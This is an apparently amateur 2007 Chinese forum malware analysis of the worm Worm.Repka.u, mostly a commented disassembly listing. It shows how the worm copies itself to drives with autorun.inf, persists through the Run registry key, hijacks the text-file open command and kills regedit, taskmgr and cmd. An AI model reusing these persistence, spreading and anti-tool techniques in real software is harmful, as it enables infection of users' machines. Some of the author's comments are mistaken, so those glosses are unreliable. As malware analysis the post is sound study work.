-
-
[旧帖] [原创]Worm.Repka.u病毒分析 0.00雪花
-
发表于: 2007-6-5 21:30 4690
-
PS:既然调试论坛不+精,那就发这里来了,给新手们看看:)
(PS:别又扣声望,我还指望这篇文章让我的声望提高到10呢!)
【文章标题】: Worm.Repka.u病毒分析
【文章作者】: NoName剑人
【作者邮箱】: wangjunyi2008@sina.com
【作者主页】: 无
【作者QQ号】: 464252600(请注明-破解-)
【软件名称】: Worm.Repka.u
【软件大小】: 204KB
【下载地址】: 自己搜索下载或见附件
【加壳方式】: 无壳
【保护方式】: 利用API来杀掉别的进程以防止被×
【编写语言】: VC++
【使用工具】: C32ASM OD
【操作平台】: XP上成功
【软件介绍】: 虫子病毒:p
【作者声明】: 只是感兴趣,没有其他目的。失误之处敬请诸位大侠赐教!
--------------------------------------------------------------------------------
【详细过程】
晕,累死我了。我可能是CRACKER里最小的了,初中……最近几天有高考,所以把双休日放到789三天了,我们已经学了10天
没休息了(汗~)
废话少说,咱来看看这个病毒,那是几年前的老病毒了,没什么威力(哪高人去整PANDA去?)所以才敢从病毒库里翻出来
首先用QUICK UNPACK(好用的查壳软件,但是脱壳在我机器上一次没实现过。人品问题?),无壳。
然后用C32ASM(0D老看不见中文……)看,找到几个病毒代码集中的地方,分析:
00401850 /> \55 PUSH EBP
00401851 |. 8BEC MOV EBP,ESP
00401853 |. 81EC 70010000 SUB ESP,170
00401859 |. 53 PUSH EBX
0040185A |. 56 PUSH ESI
0040185B |. 57 PUSH EDI
0040185C |. 8DBD 90FEFFFF LEA EDI,DWORD PTR SS:[EBP-170]
00401862 |. B9 5C000000 MOV ECX,5C
00401867 |. B8 CCCCCCCC MOV EAX,CCCCCCCC
0040186C |. F3:AB REP STOS DWORD PTR ES:[EDI]
0040186E |. 8BF4 MOV ESI,ESP
00401870 |. 68 00ED4200 PUSH A0002798.0042ED00 ; /pThreadId = A0002798.0042ED00
00401875 |. 6A 00 PUSH 0 ; |CreationFlags = 0
00401877 |. 6A 00 PUSH 0 ; |pThreadParm = NULL
00401879 |. 68 2D104000 PUSH A0002798.0040102D ; |ThreadFunction = A0002798.0040102D
0040187E |. 6A 00 PUSH 0 ; |StackSize = 0
00401880 |. 6A 00 PUSH 0 ; |pSecurity = NULL
00401882 |. FF15 4C134300 CALL DWORD PTR DS:[<&KERNEL32.CreateThre>; \CreateThread?释放?
00401888 |. 3BF4 CMP ESI,ESP
0040188A |. E8 514F0000 CALL A0002798.004067E0
0040188F |. A3 F8EC4200 MOV DWORD PTR DS:[42ECF8],EAX
00401894 |. C745 FC 04000>MOV DWORD PTR SS:[EBP-4],4
0040189B |. C645 F8 63 MOV BYTE PTR SS:[EBP-8],63
0040189F |. 833D 0CEE4200>CMP DWORD PTR DS:[42EE0C],0
004018A6 |. 0F85 21020000 JNZ A0002798.00401ACD
004018AC |. 8BF4 MOV ESI,ESP
004018AE |. FF15 C4124300 CALL DWORD PTR DS:[<&KERNEL32.GetLogical>; [GetLogicalDrives
004018B4 |. 3BF4 CMP ESI,ESP
004018B6 |. E8 254F0000 CALL A0002798.004067E0
004018BB |. 8985 F4FEFFFF MOV DWORD PTR SS:[EBP-10C],EAX
004018C1 |. C785 F0FEFFFF>MOV DWORD PTR SS:[EBP-110],0
004018CB |. EB 0F JMP SHORT A0002798.004018DC
004018CD |> 8B85 F0FEFFFF /MOV EAX,DWORD PTR SS:[EBP-110]
004018D3 |. 83C0 01 |ADD EAX,1
004018D6 |. 8985 F0FEFFFF |MOV DWORD PTR SS:[EBP-110],EAX
004018DC |> 83BD F0FEFFFF> CMP DWORD PTR SS:[EBP-110],20
004018E3 |. 0F8D 05010000 |JGE A0002798.004019EE
004018E9 |. 8B8D F4FEFFFF |MOV ECX,DWORD PTR SS:[EBP-10C]
004018EF |. 234D FC |AND ECX,DWORD PTR SS:[EBP-4]
004018F2 |. 85C9 |TEST ECX,ECX
004018F4 |. 0F84 DE000000 |JE A0002798.004019D8
004018FA |. 68 DCA04200 |PUSH A0002798.0042A0DC ; / ASCII ":\reper.exe" //这个应该是释放文件
004018FF |. 0FBE55 F8 |MOVSX EDX,BYTE PTR SS:[EBP-8] ; |
00401903 |. 52 |PUSH EDX ; |Arg3
00401904 |. 68 74A14200 |PUSH A0002798.0042A174 ; |Arg2 = 0042A174 ASCII "%c%s"
00401909 |. 8D85 F8FEFFFF |LEA EAX,DWORD PTR SS:[EBP-108] ; |
0040190F |. 50 |PUSH EAX ; |Arg1
00401910 |. E8 EB4C0000 |CALL A0002798.00406600 ; \A0002798.00406600
00401915 |. 83C4 10 |ADD ESP,10
00401918 |. 8D8D F8FEFFFF |LEA ECX,DWORD PTR SS:[EBP-108]
0040191E |. 51 |PUSH ECX
0040191F |. E8 04F7FFFF |CALL A0002798.00401028
00401924 |. 83C4 04 |ADD ESP,4
00401927 |. 3B05 10EE4200 |CMP EAX,DWORD PTR DS:[42EE10]
0040192D |. 74 1E |JE SHORT A0002798.0040194D
0040192F |. 8D95 F8FEFFFF |LEA EDX,DWORD PTR SS:[EBP-108]
00401935 |. 52 |PUSH EDX
00401936 |. E8 D9F6FFFF |CALL A0002798.00401014
0040193B |. 83C4 04 |ADD ESP,4
0040193E |. 8D85 F8FEFFFF |LEA EAX,DWORD PTR SS:[EBP-108]
00401944 |. 50 |PUSH EAX ; /Arg1
00401945 |. E8 C64F0000 |CALL A0002798.00406910 ; \A0002798.00406910
0040194A |. 83C4 04 |ADD ESP,4
0040194D |> 8D8D F8FEFFFF |LEA ECX,DWORD PTR SS:[EBP-108]
00401953 |. 51 |PUSH ECX
00401954 |. E8 B1F6FFFF |CALL A0002798.0040100A
00401959 |. 83C4 04 |ADD ESP,4
0040195C |. 8D95 F8FEFFFF |LEA EDX,DWORD PTR SS:[EBP-108]
00401962 |. 52 |PUSH EDX
00401963 |. E8 A7F6FFFF |CALL A0002798.0040100F
00401968 |. 83C4 04 |ADD ESP,4
0040196B |. 68 6CA04200 |PUSH A0002798.0042A06C ; / ASCII ":\AUTORUN.exe" //这个也应该是释放文件
00401970 |. 0FBE45 F8 |MOVSX EAX,BYTE PTR SS:[EBP-8] ; |
00401974 |. 50 |PUSH EAX ; |Arg3
00401975 |. 68 74A14200 |PUSH A0002798.0042A174 ; |Arg2 = 0042A174 ASCII "%c%s"
0040197A |. 8D8D F8FEFFFF |LEA ECX,DWORD PTR SS:[EBP-108] ; |
00401980 |. 51 |PUSH ECX ; |Arg1
00401981 |. E8 7A4C0000 |CALL A0002798.00406600 ; \A0002798.00406600
00401986 |. 83C4 10 |ADD ESP,10
00401989 |. 8D95 F8FEFFFF |LEA EDX,DWORD PTR SS:[EBP-108]
0040198F |. 52 |PUSH EDX
00401990 |. E8 A2F6FFFF |CALL A0002798.00401037
00401995 |. 83C4 04 |ADD ESP,4
00401998 |. 85C0 |TEST EAX,EAX
0040199A |. 75 1E |JNZ SHORT A0002798.004019BA
0040199C |. 8D85 F8FEFFFF |LEA EAX,DWORD PTR SS:[EBP-108]
004019A2 |. 50 |PUSH EAX
004019A3 |. E8 6CF6FFFF |CALL A0002798.00401014
004019A8 |. 83C4 04 |ADD ESP,4
004019AB |. 8D8D F8FEFFFF |LEA ECX,DWORD PTR SS:[EBP-108]
004019B1 |. 51 |PUSH ECX ; /Arg1
004019B2 |. E8 594F0000 |CALL A0002798.00406910 ; \A0002798.00406910
004019B7 |. 83C4 04 |ADD ESP,4
004019BA |> 8D95 F8FEFFFF |LEA EDX,DWORD PTR SS:[EBP-108]
004019C0 |. 52 |PUSH EDX
004019C1 |. E8 3FF6FFFF |CALL A0002798.00401005
004019C6 |. 83C4 04 |ADD ESP,4
004019C9 |. 8D85 F8FEFFFF |LEA EAX,DWORD PTR SS:[EBP-108]
004019CF |. 50 |PUSH EAX
004019D0 |. E8 3AF6FFFF |CALL A0002798.0040100F
004019D5 |. 83C4 04 |ADD ESP,4
004019D8 |> 8B4D FC |MOV ECX,DWORD PTR SS:[EBP-4]
004019DB |. D1E1 |SHL ECX,1
004019DD |. 894D FC |MOV DWORD PTR SS:[EBP-4],ECX
004019E0 |. 8A55 F8 |MOV DL,BYTE PTR SS:[EBP-8]
004019E3 |. 80C2 01 |ADD DL,1
004019E6 |. 8855 F8 |MOV BYTE PTR SS:[EBP-8],DL
004019E9 |.^ E9 DFFEFFFF \JMP A0002798.004018CD
004019EE |> 68 44A14200 PUSH A0002798.0042A144 ; / ASCII "VIEWER.exe" //这个还应该是释放文件
004019F3 |. 68 F8EB4200 PUSH A0002798.0042EBF8 ; |Arg3 = 0042EBF8
004019F8 |. 68 30A04200 PUSH A0002798.0042A030 ; |Arg2 = 0042A030 ASCII "%s%s"
004019FD |. 68 F8EA4200 PUSH A0002798.0042EAF8 ; |Arg1 = 0042EAF8
00401A02 |. E8 F94B0000 CALL A0002798.00406600 ; \A0002798.00406600
00401A07 |. 83C4 10 ADD ESP,10
00401A0A |. 68 F8EA4200 PUSH A0002798.0042EAF8
00401A0F |. E8 14F6FFFF CALL A0002798.00401028
00401A14 |. 83C4 04 ADD ESP,4
00401A17 |. 3B05 10EE4200 CMP EAX,DWORD PTR DS:[42EE10]
00401A1D |. 74 1A JE SHORT A0002798.00401A39
00401A1F |. 68 F8EA4200 PUSH A0002798.0042EAF8
00401A24 |. E8 EBF5FFFF CALL A0002798.00401014
00401A29 |. 83C4 04 ADD ESP,4
00401A2C |. 68 F8EA4200 PUSH A0002798.0042EAF8 ; /Arg1 = 0042EAF8
00401A31 |. E8 DA4E0000 CALL A0002798.00406910 ; \A0002798.00406910
00401A36 |. 83C4 04 ADD ESP,4
00401A39 |> 68 F8EA4200 PUSH A0002798.0042EAF8
00401A3E |. E8 C7F5FFFF CALL A0002798.0040100A
00401A43 |. 83C4 04 ADD ESP,4
00401A46 |. 68 F8EA4200 PUSH A0002798.0042EAF8
00401A4B |. E8 C4F5FFFF CALL A0002798.00401014
00401A50 |. 83C4 04 ADD ESP,4
00401A53 |. 68 F8EB4200 PUSH A0002798.0042EBF8 ; /Arg3 = 0042EBF8
00401A58 |. 68 2CA14200 PUSH A0002798.0042A12C ; | ASCII "%ssystem32\NOTEPAD.EXE" //这个应该hai是释放文件
00401A5D |. 68 F8E94200 PUSH A0002798.0042E9F8 ; |Arg1 = 0042E9F8
00401A62 |. E8 994B0000 CALL A0002798.00406600 ; \A0002798.00406600
00401A67 |. 83C4 0C ADD ESP,0C
00401A6A |. 68 F8E94200 PUSH A0002798.0042E9F8
00401A6F |. E8 B4F5FFFF CALL A0002798.00401028
00401A74 |. 83C4 04 ADD ESP,4
00401A77 |. 3B05 10EE4200 CMP EAX,DWORD PTR DS:[42EE10]
00401A7D |. 74 1A JE SHORT A0002798.00401A99
00401A7F |. 68 F8E94200 PUSH A0002798.0042E9F8
00401A84 |. E8 8BF5FFFF CALL A0002798.00401014
00401A89 |. 83C4 04 ADD ESP,4
00401A8C |. 68 F8E94200 PUSH A0002798.0042E9F8 ; /Arg1 = 0042E9F8
00401A91 |. E8 7A4E0000 CALL A0002798.00406910 ; \A0002798.00406910
00401A96 |. 83C4 04 ADD ESP,4
00401A99 |> 68 F8E94200 PUSH A0002798.0042E9F8
00401A9E |. E8 67F5FFFF CALL A0002798.0040100A
00401AA3 |. 83C4 04 ADD ESP,4
00401AA6 |. 68 F8E94200 PUSH A0002798.0042E9F8
00401AAB |. E8 64F5FFFF CALL A0002798.00401014
00401AB0 |. 83C4 04 ADD ESP,4
00401AB3 |. 68 50B34200 PUSH A0002798.0042B350
00401AB8 |. E8 4DF5FFFF CALL A0002798.0040100A
00401ABD |. 83C4 04 ADD ESP,4
00401AC0 |. 68 50B34200 PUSH A0002798.0042B350
00401AC5 |. E8 4AF5FFFF CALL A0002798.00401014
00401ACA |. 83C4 04 ADD ESP,4
00401ACD |> A1 0CEE4200 MOV EAX,DWORD PTR DS:[42EE0C]
00401AD2 |. 83C0 01 ADD EAX,1
00401AD5 |. A3 0CEE4200 MOV DWORD PTR DS:[42EE0C],EAX
00401ADA |. A1 0CEE4200 MOV EAX,DWORD PTR DS:[42EE0C]
00401ADF |. 99 CDQ
00401AE0 |. B9 05000000 MOV ECX,5
00401AE5 |. F7F9 IDIV ECX
00401AE7 |. 8915 0CEE4200 MOV DWORD PTR DS:[42EE0C],EDX
00401AED |. C785 ECFEFFFF>MOV DWORD PTR SS:[EBP-114],A0002798.0042>
00401AF7 |. C785 E4FEFFFF>MOV DWORD PTR SS:[EBP-11C],A0002798.0042>; 干坏事了! ASCII "Software\Microsoft\Windows\CurrentVersion\Run"写注册表
00401B01 |. 8BF4 MOV ESI,ESP ; 写注册表取得开机运行权
00401B03 |. 8D95 E8FEFFFF LEA EDX,DWORD PTR SS:[EBP-118]
00401B09 |. 52 PUSH EDX ; /pHandle
00401B0A |. 68 06000200 PUSH 20006 ; |Access = KEY_WRITE
00401B0F |. 6A 00 PUSH 0 ; |Reserved = 0
00401B11 |. 8B85 E4FEFFFF MOV EAX,DWORD PTR SS:[EBP-11C] ; |
00401B17 |. 50 PUSH EAX ; |Subkey
00401B18 |. 68 02000080 PUSH 80000002 ; |hKey = HKEY_LOCAL_MACHINE
00401B1D |. FF15 8C124300 CALL DWORD PTR DS:[<&ADVAPI32.RegOpenKey>; \RegOpenKeyExA
00401B23 |. 3BF4 CMP ESI,ESP
00401B25 |. E8 B64C0000 CALL A0002798.004067E0
00401B2A |. 8985 E0FEFFFF MOV DWORD PTR SS:[EBP-120],EAX
00401B30 |. 8B8D ECFEFFFF MOV ECX,DWORD PTR SS:[EBP-114]
00401B36 |. 51 PUSH ECX
00401B37 |. E8 C44B0000 CALL A0002798.00406700
00401B3C |. 83C4 04 ADD ESP,4
00401B3F |. 8BF4 MOV ESI,ESP
00401B41 |. 50 PUSH EAX ; /BufSize
00401B42 |. 8B95 ECFEFFFF MOV EDX,DWORD PTR SS:[EBP-114] ; |
00401B48 |. 52 PUSH EDX ; |Buffer
00401B49 |. 6A 01 PUSH 1 ; |ValueType = REG_SZ
00401B4B |. 6A 00 PUSH 0 ; |Reserved = 0
00401B4D |. 68 ACA04200 PUSH A0002798.0042A0AC ; |ValueName = "runreper"
00401B52 |. 8B85 E8FEFFFF MOV EAX,DWORD PTR SS:[EBP-118] ; |
00401B58 |. 50 PUSH EAX ; |hKey
00401B59 |. FF15 80124300 CALL DWORD PTR DS:[<&ADVAPI32.RegSetValu>; \RegSetValueExA
00401B5F |. 3BF4 CMP ESI,ESP
00401B61 |. E8 7A4C0000 CALL A0002798.004067E0
00401B66 |. 8985 DCFEFFFF MOV DWORD PTR SS:[EBP-124],EAX
00401B6C |. 8BF4 MOV ESI,ESP
00401B6E |. 8B8D E8FEFFFF MOV ECX,DWORD PTR SS:[EBP-118]
00401B74 |. 51 PUSH ECX ; /hKey
00401B75 |. FF15 84124300 CALL DWORD PTR DS:[<&ADVAPI32.RegCloseKe>; \RegCloseKey
00401B7B |. 3BF4 CMP ESI,ESP
00401B7D |. E8 5E4C0000 CALL A0002798.004067E0 ; 又改TXT的关联
00401B82 |. C785 E4FEFFFF>MOV DWORD PTR SS:[EBP-11C],A0002798.0042>; ASCII "txtfile\shell\open\command"
00401B8C |. C785 D8FEFFFF>MOV DWORD PTR SS:[EBP-128],A0002798.0042>
00401B96 |. 68 68A04200 PUSH A0002798.0042A068 ; ASCII " %1"
00401B9B |. 8B95 D8FEFFFF MOV EDX,DWORD PTR SS:[EBP-128]
00401BA1 |. 52 PUSH EDX
00401BA2 |. E8 894C0000 CALL A0002798.00406830
00401BA7 |. 83C4 08 ADD ESP,8
00401BAA |. 8BF4 MOV ESI,ESP
00401BAC |. 8D85 E8FEFFFF LEA EAX,DWORD PTR SS:[EBP-118]
00401BB2 |. 50 PUSH EAX ; /pHandle
00401BB3 |. 68 06000200 PUSH 20006 ; |Access = KEY_WRITE
00401BB8 |. 6A 00 PUSH 0 ; |Reserved = 0
00401BBA |. 8B8D E4FEFFFF MOV ECX,DWORD PTR SS:[EBP-11C] ; |
00401BC0 |. 51 PUSH ECX ; |Subkey
00401BC1 |. 68 00000080 PUSH 80000000 ; |hKey = HKEY_CLASSES_ROOT
00401BC6 |. FF15 8C124300 CALL DWORD PTR DS:[<&ADVAPI32.RegOpenKey>; \RegOpenKeyExA
00401BCC |. 3BF4 CMP ESI,ESP
00401BCE |. E8 0D4C0000 CALL A0002798.004067E0
00401BD3 |. 8985 D4FEFFFF MOV DWORD PTR SS:[EBP-12C],EAX
00401BD9 |. 8B95 D8FEFFFF MOV EDX,DWORD PTR SS:[EBP-128]
00401BDF |. 52 PUSH EDX
00401BE0 |. E8 1B4B0000 CALL A0002798.00406700
00401BE5 |. 83C4 04 ADD ESP,4
00401BE8 |. 8BF4 MOV ESI,ESP
00401BEA |. 50 PUSH EAX ; /BufSize
00401BEB |. 8B85 D8FEFFFF MOV EAX,DWORD PTR SS:[EBP-128] ; |
00401BF1 |. 50 PUSH EAX ; |Buffer
00401BF2 |. 6A 02 PUSH 2 ; |ValueType = REG_EXPAND_SZ
00401BF4 |. 6A 00 PUSH 0 ; |Reserved = 0
00401BF6 |. 6A 00 PUSH 0 ; |ValueName = NULL
00401BF8 |. 8B8D E8FEFFFF MOV ECX,DWORD PTR SS:[EBP-118] ; |
00401BFE |. 51 PUSH ECX ; |hKey
00401BFF |. FF15 80124300 CALL DWORD PTR DS:[<&ADVAPI32.RegSetValu>; \RegSetValueExA
00401C05 |. 3BF4 CMP ESI,ESP
00401C07 |. E8 D44B0000 CALL A0002798.004067E0
00401C0C |. 8985 D0FEFFFF MOV DWORD PTR SS:[EBP-130],EAX
00401C12 |. 8BF4 MOV ESI,ESP
00401C14 |. 8B95 E8FEFFFF MOV EDX,DWORD PTR SS:[EBP-118]
00401C1A |. 52 PUSH EDX ; /hKey
00401C1B |. FF15 84124300 CALL DWORD PTR DS:[<&ADVAPI32.RegCloseKe>; \RegCloseKey
00401C21 |. 3BF4 CMP ESI,ESP
00401C23 |. E8 B84B0000 CALL A0002798.004067E0
00401C28 |. 5F POP EDI
00401C29 |. 5E POP ESI
00401C2A |. 5B POP EBX
00401C2B |. 81C4 70010000 ADD ESP,170
00401C31 |. 3BEC CMP EBP,ESP
00401C33 |. E8 A84B0000 CALL A0002798.004067E0
00401C38 |. 8BE5 MOV ESP,EBP
00401C3A |. 5D POP EBP
00401C3B \. C2 1000 RETN 10
在里面分析了,我也不写了……
还有
00401FF0 > \55 PUSH EBP
00401FF1 . 8BEC MOV EBP,ESP
00401FF3 . 6A FF PUSH -1
00401FF5 . 68 098A4100 PUSH A0002798.00418A09 ; SE 处理程序安装
00401FFA . 64:A1 0000000>MOV EAX,DWORD PTR FS:[0]
00402000 . 50 PUSH EAX
00402001 . 64:8925 00000>MOV DWORD PTR FS:[0],ESP
00402008 . 81EC B0000000 SUB ESP,0B0
0040200E . 53 PUSH EBX
0040200F . 56 PUSH ESI
00402010 . 57 PUSH EDI
00402011 . 8DBD 44FFFFFF LEA EDI,DWORD PTR SS:[EBP-BC]
00402017 . B9 2C000000 MOV ECX,2C
0040201C . B8 CCCCCCCC MOV EAX,CCCCCCCC
00402021 . F3:AB REP STOS DWORD PTR ES:[EDI]
00402023 . 6A 01 PUSH 1 ; /Arg1 = 00000001
00402025 . 8D4D AC LEA ECX,DWORD PTR SS:[EBP-54] ; |
00402028 . E8 83050000 CALL A0002798.004025B0 ; \A0002798.004025B0
0040202D . C745 FC 00000>MOV DWORD PTR SS:[EBP-4],0
00402034 . A1 3CA24200 MOV EAX,DWORD PTR DS:[42A23C]
00402039 . 50 PUSH EAX ; /Arg3 => 000001A4
0040203A . 6A 01 PUSH 1 ; |Arg2 = 00000001
0040203C . 8B4D 08 MOV ECX,DWORD PTR SS:[EBP+8] ; |
0040203F . 51 PUSH ECX ; |Arg1
00402040 . 8D4D AC LEA ECX,DWORD PTR SS:[EBP-54] ; |
00402043 . E8 780C0000 CALL A0002798.00402CC0 ; \A0002798.00402CC0
00402048 . 6A 1A PUSH 1A ; /Arg2 = 0000001A
0040204A . 8D55 8C LEA EDX,DWORD PTR SS:[EBP-74] ; |
0040204D . 52 PUSH EDX ; |Arg1
0040204E . 8D4D AC LEA ECX,DWORD PTR SS:[EBP-54] ; |
00402051 . E8 8A2A0000 CALL A0002798.00404AE0 ; \A0002798.00404AE0
00402056 . 8D4D AC LEA ECX,DWORD PTR SS:[EBP-54]
00402059 . E8 E20C0000 CALL A0002798.00402D40
0040205E . C645 A5 00 MOV BYTE PTR SS:[EBP-5B],0
00402062 . 68 44A04200 PUSH A0002798.0042A044 ; ASCII "[autorun]" //开始在U盘里写AUTORUN.INF....
00402067 . 8D45 8C LEA EAX,DWORD PTR SS:[EBP-74]
0040206A . 50 PUSH EAX
0040206B . E8 E04D0000 CALL A0002798.00406E50
00402070 . 83C4 08 ADD ESP,8
00402073 . 85C0 TEST EAX,EAX
00402075 . 74 30 JE SHORT A0002798.004020A7
00402077 . 68 50A04200 PUSH A0002798.0042A050 ; ASCII "open=reper.exe" //看来这个程序的原文件名就是这个了
0040207C . 8D4D 8C LEA ECX,DWORD PTR SS:[EBP-74]
0040207F . 51 PUSH ECX
00402080 . E8 CB4D0000 CALL A0002798.00406E50
00402085 . 83C4 08 ADD ESP,8
00402088 . 85C0 TEST EAX,EAX
0040208A . 74 1B JE SHORT A0002798.004020A7
0040208C . C745 88 01000>MOV DWORD PTR SS:[EBP-78],1
00402093 . C745 FC FFFFF>MOV DWORD PTR SS:[EBP-4],-1
0040209A . 8D4D AC LEA ECX,DWORD PTR SS:[EBP-54]
0040209D . E8 90EFFFFF CALL A0002798.00401032
004020A2 . 8B45 88 MOV EAX,DWORD PTR SS:[EBP-78]
004020A5 . EB 19 JMP SHORT A0002798.004020C0
004020A7 > C745 84 00000>MOV DWORD PTR SS:[EBP-7C],0
004020AE . C745 FC FFFFF>MOV DWORD PTR SS:[EBP-4],-1
004020B5 . 8D4D AC LEA ECX,DWORD PTR SS:[EBP-54]
004020B8 . E8 75EFFFFF CALL A0002798.00401032
004020BD . 8B45 84 MOV EAX,DWORD PTR SS:[EBP-7C]
004020C0 > 8B4D F4 MOV ECX,DWORD PTR SS:[EBP-C]
004020C3 . 64:890D 00000>MOV DWORD PTR FS:[0],ECX
004020CA . 5F POP EDI
004020CB . 5E POP ESI
004020CC . 5B POP EBX
004020CD . 81C4 BC000000 ADD ESP,0BC
004020D3 . 3BEC CMP EBP,ESP
004020D5 . E8 06470000 CALL A0002798.004067E0
004020DA . 8BE5 MOV ESP,EBP
004020DC . 5D POP EBP
004020DD . C3 RETN
004021C0 /> \55 PUSH EBP
004021C1 |. 8BEC MOV EBP,ESP
004021C3 |. 81EC 70010000 SUB ESP,170
004021C9 |. 53 PUSH EBX
004021CA |. 56 PUSH ESI
004021CB |. 57 PUSH EDI
004021CC |. 8DBD 90FEFFFF LEA EDI,DWORD PTR SS:[EBP-170]
004021D2 |. B9 5C000000 MOV ECX,5C
004021D7 |. B8 CCCCCCCC MOV EAX,CCCCCCCC
004021DC |. F3:AB REP STOS DWORD PTR ES:[EDI]
004021DE |> B8 01000000 /MOV EAX,1
004021E3 |. 85C0 |TEST EAX,EAX
004021E5 |. 0F84 F1010000 |JE A0002798.004023DC
004021EB |. C745 FC 00000>|MOV DWORD PTR SS:[EBP-4],0
004021F2 |. C785 D4FEFFFF>|MOV DWORD PTR SS:[EBP-12C],0
004021FC |. B9 49000000 |MOV ECX,49
00402201 |. 33C0 |XOR EAX,EAX
00402203 |. 8DBD D8FEFFFF |LEA EDI,DWORD PTR SS:[EBP-128]
00402209 |. F3:AB |REP STOS DWORD PTR ES:[EDI]
0040220B |. 6A 00 |PUSH 0 ; /ProcessID = 0
0040220D |. 6A 02 |PUSH 2 ; |Flags = TH32CS_SNAPPROCESS
0040220F |. E8 08030000 |CALL <JMP.&KERNEL32.CreateToolhelp32Sna>; \CreateToolhelp32Snapshot // 应该是截图吧
00402214 |. 8945 FC |MOV DWORD PTR SS:[EBP-4],EAX
00402217 |. C785 D4FEFFFF>|MOV DWORD PTR SS:[EBP-12C],128
00402221 |. 8D8D D4FEFFFF |LEA ECX,DWORD PTR SS:[EBP-12C]
00402227 |. 51 |PUSH ECX ; /pProcessentry
00402228 |. 8B55 FC |MOV EDX,DWORD PTR SS:[EBP-4] ; |
0040222B |. 52 |PUSH EDX ; |hSnapshot
0040222C |. E8 E5020000 |CALL <JMP.&KERNEL32.Process32First> ; \Process32First
00402231 |> 8BF4 |/MOV ESI,ESP
00402233 |. 8D85 F8FEFFFF ||LEA EAX,DWORD PTR SS:[EBP-108]
00402239 |. 50 ||PUSH EAX ; /StringOrChar
0040223A |. FF15 2C144300 ||CALL DWORD PTR DS:[<&USER32.CharLowerA>; \CharLowerA
00402240 |. 3BF4 ||CMP ESI,ESP
00402242 |. E8 99450000 ||CALL A0002798.004067E0
00402247 |. 8985 D0FEFFFF ||MOV DWORD PTR SS:[EBP-130],EAX ; 碰上下面几个喀掉
0040224D |. 68 98A04200 ||PUSH A0002798.0042A098 ; ASCII "regedit.exe"
00402252 |. 8B8D D0FEFFFF ||MOV ECX,DWORD PTR SS:[EBP-130]
00402258 |. 51 ||PUSH ECX
00402259 |. E8 F24B0000 ||CALL A0002798.00406E50
0040225E |. 83C4 08 ||ADD ESP,8
00402261 |. 85C0 ||TEST EAX,EAX
00402263 |. 75 48 ||JNZ SHORT A0002798.004022AD
00402265 |. 68 14A14200 ||PUSH A0002798.0042A114 ; ASCII "taskmgr.exe"
0040226A |. 8B95 D0FEFFFF ||MOV EDX,DWORD PTR SS:[EBP-130]
00402270 |. 52 ||PUSH EDX
00402271 |. E8 DA4B0000 ||CALL A0002798.00406E50
00402276 |. 83C4 08 ||ADD ESP,8
00402279 |. 85C0 ||TEST EAX,EAX
0040227B |. 75 30 ||JNZ SHORT A0002798.004022AD
0040227D |. 68 08A14200 ||PUSH A0002798.0042A108 ; ASCII "cmd.exe"
00402282 |. 8B85 D0FEFFFF ||MOV EAX,DWORD PTR SS:[EBP-130]
00402288 |. 50 ||PUSH EAX
00402289 |. E8 C24B0000 ||CALL A0002798.00406E50
0040228E |. 83C4 08 ||ADD ESP,8
00402291 |. 85C0 ||TEST EAX,EAX
00402293 |. 75 18 ||JNZ SHORT A0002798.004022AD
00402295 |. 68 E4A14200 ||PUSH A0002798.0042A1E4 ; ASCII "ntvdm.exe"
0040229A |. 8B8D D0FEFFFF ||MOV ECX,DWORD PTR SS:[EBP-130]
004022A0 |. 51 ||PUSH ECX
004022A1 |. E8 AA4B0000 ||CALL A0002798.00406E50
004022A6 |. 83C4 08 ||ADD ESP,8
004022A9 |. 85C0 ||TEST EAX,EAX
004022AB |. 74 2F ||JE SHORT A0002798.004022DC
004022AD |> 8BF4 ||MOV ESI,ESP
004022AF |. 6A 01 ||PUSH 1
004022B1 |. 8BFC ||MOV EDI,ESP
004022B3 |. 8B95 DCFEFFFF ||MOV EDX,DWORD PTR SS:[EBP-124]
004022B9 |. 52 ||PUSH EDX ; /ProcessId
004022BA |. 6A 00 ||PUSH 0 ; |Inheritable = FALSE
004022BC |. 68 FF0F1F00 ||PUSH 1F0FFF ; |Access = PROCESS_ALL_ACCESS
004022C1 |. FF15 E0124300 ||CALL DWORD PTR DS:[<&KERNEL32.OpenProc>; \OpenProcess.开始枚举了
004022C7 |. 3BFC ||CMP EDI,ESP
004022C9 |. E8 12450000 ||CALL A0002798.004067E0
004022CE |. 50 ||PUSH EAX ; |hProcess
004022CF |. FF15 DC124300 ||CALL DWORD PTR DS:[<&KERNEL32.Terminat>; \TerminateProcess
004022D5 |. 3BF4 ||CMP ESI,ESP
004022D7 |. E8 04450000 ||CALL A0002798.004067E0
004022DC |> 68 D4A14200 ||PUSH A0002798.0042A1D4 ; ASCII "proc"
004022E1 |. 8B85 D0FEFFFF ||MOV EAX,DWORD PTR SS:[EBP-130]
004022E7 |. 50 ||PUSH EAX
004022E8 |. E8 634B0000 ||CALL A0002798.00406E50
004022ED |. 83C4 08 ||ADD ESP,8
004022F0 |. 85C0 ||TEST EAX,EAX
004022F2 |. 75 78 ||JNZ SHORT A0002798.0040236C
004022F4 |. 68 C8A14200 ||PUSH A0002798.0042A1C8
004022F9 |. 8B8D D0FEFFFF ||MOV ECX,DWORD PTR SS:[EBP-130]
004022FF |. 51 ||PUSH ECX
00402300 |. E8 4B4B0000 ||CALL A0002798.00406E50
00402305 |. 83C4 08 ||ADD ESP,8
00402308 |. 85C0 ||TEST EAX,EAX
0040230A |. 75 60 ||JNZ SHORT A0002798.0040236C
0040230C |. 68 BCA14200 ||PUSH A0002798.0042A1BC ; //这里OD看不见,用C32ASM分析的是碰上窗口有“任务”的就喀嚓
00402311 |. 8B95 D0FEFFFF ||MOV EDX,DWORD PTR SS:[EBP-130]
00402317 |. 52 ||PUSH EDX
00402318 |. E8 334B0000 ||CALL A0002798.00406E50
0040231D |. 83C4 08 ||ADD ESP,8
00402320 |. 85C0 ||TEST EAX,EAX
00402322 |. 75 48 ||JNZ SHORT A0002798.0040236C
00402324 |. 68 B4A14200 ||PUSH A0002798.0042A1B4
00402329 |. 8B85 D0FEFFFF ||MOV EAX,DWORD PTR SS:[EBP-130]
0040232F |. 50 ||PUSH EAX
00402330 |. E8 1B4B0000 ||CALL A0002798.00406E50
00402335 |. 83C4 08 ||ADD ESP,8
00402338 |. 85C0 ||TEST EAX,EAX
0040233A |. 75 30 ||JNZ SHORT A0002798.0040236C
0040233C |. 68 ACA14200 ||PUSH A0002798.0042A1AC ; //这里OD看不见,用C32ASM分析的是碰上窗口有“木马”的就喀嚓
00402341 |. 8B8D D0FEFFFF ||MOV ECX,DWORD PTR SS:[EBP-130]
00402347 |. 51 ||PUSH ECX
00402348 |. E8 034B0000 ||CALL A0002798.00406E50
